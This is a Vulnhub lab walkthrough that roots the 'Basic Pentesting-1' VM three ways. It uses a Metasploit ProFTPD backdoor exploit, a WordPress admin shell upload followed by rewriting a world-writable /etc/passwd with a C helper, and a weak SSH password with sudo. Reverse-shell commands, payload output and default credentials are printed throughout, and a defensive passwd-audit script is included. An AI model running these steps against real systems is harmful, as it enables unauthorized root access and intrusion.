Vulnhub Basic Pentesting – 1 Writeup

This is a walkthrough of the Vulnhub machine ‘Basic Pentesting-1’, released on Dec 8th, 2017. Credits to Josiah Pierce for releasing this VM. I imported the virtual machine into VMware Player in NAT mode. In this machine, we have to gain root access.

Server IP: 192.168.21.146
Attacker IP: 192.168.1.147
Note: Edit hosts file to add “192.168.21.146 vtcsec” (Not Mandatory)

Using Nmap to enumerate the open ports

$root@kali:~# nmap -sC -sV 192.168.21.146
Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-10 07:27 IST
Nmap scan report for vtcsec (192.168.21.146)
Host is up (0.000044s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.3c
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d6:01:90:39:2d:8f:46:fb:03:86:73:b3:3c:54:7e:54 (RSA)
|   256 f1:f3:c0:dd:ba:a4:85:f7:13:9a:da:3a:bb:4d:93:04 (ECDSA)
|_  256 12:e2:98:d2:a3:e7:36:4f:be:6b:ce:36:6b:7e:0d:9e (EdDSA)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:4F:6B:0C (VMware)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.72 seconds

I have exploited the machine in three ways, treating only one port as open at a time.

Exploitation using port 21 (proftpd 1.3.3c)

Scanning port 21 for vulnerabilities using Nmap

$root@kali:~# nmap --script=vuln -p21 192.168.21.146
Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-10 07:34 IST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for vtcsec (192.168.21.146)
Host is up (0.00017s latency).

PORT   STATE SERVICE
21/tcp open  ftp
| ftp-proftpd-backdoor: 
|   This installation has been backdoored.
|   Command: id
|_  Results: uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
|_sslv2-drown: 
MAC Address: 00:0C:29:4F:6B:0C (VMware)
Nmap done: 1 IP address (1 host up) scanned in 41.43 seconds

Exploiting ProFTPD 1.3.3c using the Metasploit module exploit/unix/ftp/proftpd_133c_backdoor

$root@kali:~# msfconsole
......
msf > use exploit/unix/ftp/proftpd_133c_backdoor 
msf exploit(unix/ftp/proftpd_133c_backdoor) > set lhost 192.168.21.147
lhost => 192.168.21.147
msf exploit(unix/ftp/proftpd_133c_backdoor) > set rhost 192.168.21.146
rhost => 192.168.21.146
msf exploit(unix/ftp/proftpd_133c_backdoor) > exploit
[*] Started reverse TCP double handler on 192.168.21.147:4444 
[*] 192.168.21.146:21 - Sending Backdoor Command
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo TDh3k6X8Fd2mIKU9;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "TDh3k6X8Fd2mIKU9\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.21.147:4444 -> 192.168.21.146:33154) at 2018-01-10 07:46:00 +0530
id
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)

Exploitation using port 80 (Web Server)

Enumeration of port 80 web server using Nikto

$root@kali:~# nikto -h http://192.168.21.146
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.21.146
+ Target Hostname:    192.168.21.146
+ Target Port:        80
+ Start Time:         2018-01-10 08:01:13 (GMT5.5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0xb1 0x55e1c7758dcdb 
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD 
+ Uncommon header 'link' found, with contents: <http://vtcsec/secret/index.php/wp-json/>; rel="https://api.w.org/"
+ OSVDB-3092: /secret/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7535 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time:           2018-01-10 08:01:24 (GMT5.5) (11 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Browsing http://192.168.21.146/secret/ shows a WordPress site.

Trying username ‘admin’ and password ‘admin’ in http://192.168.21.146/secret/wp-admin/ gives us WordPress admin access. Using Metasploit module exploit/unix/webapp/wp_admin_shell_upload, a low-privileged shell is obtained.

$root@kali:~# msfconsole
.....
msf > use exploit/unix/webapp/wp_admin_shell_upload
msf exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME admin
USERNAME => admin
msf exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD admin
PASSWORD => admin
msf exploit(unix/webapp/wp_admin_shell_upload) > set TARGETURI /secret/
TARGETURI => /secret/
msf exploit(unix/webapp/wp_admin_shell_upload) > set lhost 192.168.21.147
lhost => 192.168.21.147
msf exploit(unix/webapp/wp_admin_shell_upload) > set rhost 192.168.21.146
rhost => 192.168.21.146
msf exploit(unix/webapp/wp_admin_shell_upload) > exploit

[*] Started reverse TCP handler on 192.168.21.147:4444 
[*] Authenticating with WordPress using admin:admin...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /secret/wp-content/plugins/PGtlMmeils/uuzjewXkbs.php...
[*] Sending stage (37543 bytes) to 192.168.21.146
[*] Meterpreter session 1 opened (192.168.21.147:4444 -> 192.168.21.146:33170) at 2018-01-10 08:32:40 +0530
[+] Deleted uuzjewXkbs.php
[+] Deleted PGtlMmeils.php

meterpreter > getuid
Server username: www-data (33)

Now, while enumerating for privilege escalation, /etc/passwd was found to be world-writable.

meterpreter > shell
Process 5303 created.
Channel 0 created.
python -c 'import pty;pty.spawn("/bin/sh")'
$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ ls -al /etc/passwd
ls -al /etc/passwd
-rw-rw-rw- 1 root root 2410 Jan  9 20:44 /etc/passwd 

To escalate privileges I can now edit the /etc/passwd file. I am using a small program, password.c, written by our CTF team member zC00l and derived from the Dirty c0w exploit. It generates a replacement ‘root’ line for /etc/passwd that carries a password hash of our choosing.

password.c

/* Credits to zC00l; edited from the Dirty c0w exploit */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <crypt.h>
#include <string.h>

/* Traditional DES crypt() only uses the first two salt characters ("zc"). */
const char* salt = "zc00l";
const char* common_passwd_file = "/etc/passwd";

/* One /etc/passwd record, field by field. */
struct Userinfo {
   char *username;
   char *hash;
   int user_id;
   int group_id;
   char *info;
   char *home_dir;
   char *shell;
};

char *generate_password_hash(char *plaintext_pw) {
  return crypt(plaintext_pw, salt);
}

/* Format the record as a colon-separated passwd line; the caller frees it. */
char *generate_passwd_line(struct Userinfo u) {
  const char *format = "%s:%s:%d:%d:%s:%s:%s\n";
  int size = snprintf(NULL, 0, format, u.username, u.hash,
    u.user_id, u.group_id, u.info, u.home_dir, u.shell);
  char *ret = malloc(size + 1);
  sprintf(ret, format, u.username, u.hash, u.user_id,
    u.group_id, u.info, u.home_dir, u.shell);
  return ret;
}

int main(int argc, char **argv)
{
  struct Userinfo user;
  user.username = "root";
  user.user_id = 0;
  user.group_id = 0;
  user.info = "root";
  user.home_dir = "/root";
  user.shell = "/bin/sh";
  char* plaintext_pw;
  if (argc >= 2) {
    plaintext_pw = argv[1];
    printf("Please enter the new password: %s\n", plaintext_pw);
  } else {
    plaintext_pw = getpass("Please enter the new password: ");
  }
  user.hash = generate_password_hash(plaintext_pw);
  char *complete_passwd_line = generate_passwd_line(user);
  strtok(complete_passwd_line, "\n");   /* drop the trailing newline */
  printf("User line: %s\n", complete_passwd_line);
  free(complete_passwd_line);
  return 0;
}

Copy the contents of the victim’s /etc/passwd and paste them into a file on the attacker system. Now compile password.c and execute it. When prompted, I used the password ‘test’.

$root@kali:~# gcc -o password password.c -lcrypt
$root@kali:~# ./password 
Please enter the new password: 
User line: root:zc9jtfILVqO8A:0:0:root:/root:/bin/sh

Use root:zc9jtfILVqO8A:0:0:root:/root:/bin/sh to replace the ‘root’ entry in the local file. Copy the modified file to the victim system to replace the existing /etc/passwd (copying and pasting it in base64 form is recommended).
The modified /etc/passwd file on the victim should then begin with

$ head -n 1 /etc/passwd
head -n 1 /etc/passwd
root:zc9jtfILVqO8A:0:0:root:/root:/bin/sh

Finally, root access:

$ su root
su root
Password: test
# id
id
uid=0(root) gid=0(root) groups=0(root)
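As a defender-side complement to this escalation path, here is an added Python check (not part of the original writeup) that audits /etc/passwd the way this finding would be caught: it flags a group- or world-writable mode such as the -rw-rw-rw- seen above, and flags any entry whose password field holds an inline hash instead of the ‘x’ that defers to /etc/shadow. It also flags a non-root account with UID 0, a related misuse of the same file. The sample passwd content is constructed to mirror the modified root line.

```python
import stat

# Constructed sample mirroring the writeup: the root entry carries an inline
# DES hash instead of the 'x' that defers to /etc/shadow.
SAMPLE_PASSWD = """root:zc9jtfILVqO8A:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
marlinspike:x:1000:1000:marlinspike,,,:/home/marlinspike:/bin/bash
"""

# Values that mean "no password here": deferred to /etc/shadow or locked.
DEFERRED_OR_LOCKED = {"x", "*", "!", "!!"}

def audit_passwd_lines(lines):
    """Return (username, reason) findings for passwd-format lines."""
    findings = []
    for raw in lines:
        line = raw.rstrip("\n")
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((line, "malformed entry, expected 7 fields"))
            continue
        user, pw, uid = fields[0], fields[1], fields[2]
        if pw == "":
            findings.append((user, "empty password field"))
        elif pw not in DEFERRED_OR_LOCKED:
            findings.append((user, "password hash stored inline in /etc/passwd"))
        if uid == "0" and user != "root":
            findings.append((user, "non-root account with UID 0"))
    return findings

def passwd_mode_findings(mode):
    """Flag a file mode that lets group or others write the passwd file."""
    findings = []
    if mode & stat.S_IWGRP:
        findings.append("group-writable")
    if mode & stat.S_IWOTH:
        findings.append("world-writable")
    return findings

if __name__ == "__main__":
    print(audit_passwd_lines(SAMPLE_PASSWD.splitlines(True)))
    print(passwd_mode_findings(0o100666))  # the -rw-rw-rw- mode seen on the VM
```

On a real host, pass `os.stat("/etc/passwd").st_mode` to `passwd_mode_findings` and an open file handle to `audit_passwd_lines`.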

Exploitation using port 22 (SSH service)

This is a simple proof of how easy it is to gain access with weak passwords. Log in using username ‘marlinspike’ and password ‘marlinspike’ (once you have a shell on the victim, you can see the user ‘marlinspike’ in /etc/passwd). Use sudo to elevate privileges to root.

$root@kali:~# ssh marlinspike@192.168.21.146
marlinspike@192.168.21.146's password: 
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.10.0-28-generic x86_64)
....
Last login: Tue Jan  9 22:55:19 2018 from 192.168.21.147
marlinspike@vtcsec:~$ sudo su -
[sudo] password for marlinspike: 
# id
uid=0(root) gid=0(root) groups=0(root)

Please comment if you find other methods!!
